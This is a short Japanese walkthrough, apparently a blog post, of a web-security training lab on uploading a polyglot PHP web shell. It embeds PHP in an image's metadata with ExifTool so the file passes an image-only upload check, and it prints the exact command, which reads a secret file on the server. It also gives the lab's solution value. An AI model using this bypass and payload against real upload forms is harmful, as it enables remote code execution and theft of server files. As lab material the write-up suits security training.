Hello there, ('ω')ノ
polyglot webシェルアップロードによるリモートコード実行を。
まずは、ログインして。
いつもどおり悪意のあるPHPファイルをアップロードすると。
イメージファイルではないとのことで。
リピータで、ヌルバイトと拡張子を追加してSendしてみると。
同じく、イメージファイルではないとのことで。
とりあえず、ExifToolをダウンロードすることに。
これは、写真や画像やメディアファイルからメタデータを取得したり。
追加したり変更したりできるツールで。
https://exiftool.jp.uptodown.com/windows/download
解凍してあとは、名前をexiftoolにしておいて。
適当な画像ファイルにコメントとしてPHPファイルのコードを追加することに。
'START'と'END'は、位置を特定しやすくするために。
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" test.png -o polyglot.php
画像に悪意のコードを追加したPHPファイルをアップロードすると。
画像データとみなして拡張子が.phpでもアップロードできて。
アップロードした位置を確認して。
直接、URLにアクセスしてみると。
https://ac7d1f901ea31adac03944b300860092.web-security-academy.net/files/avatars/polyglot.php
取得したコードを入力すると、クリアできて。
mVe9eMTpecNDL0yPbiege4ef5eeVzjLt
Best regards, (^^ゞ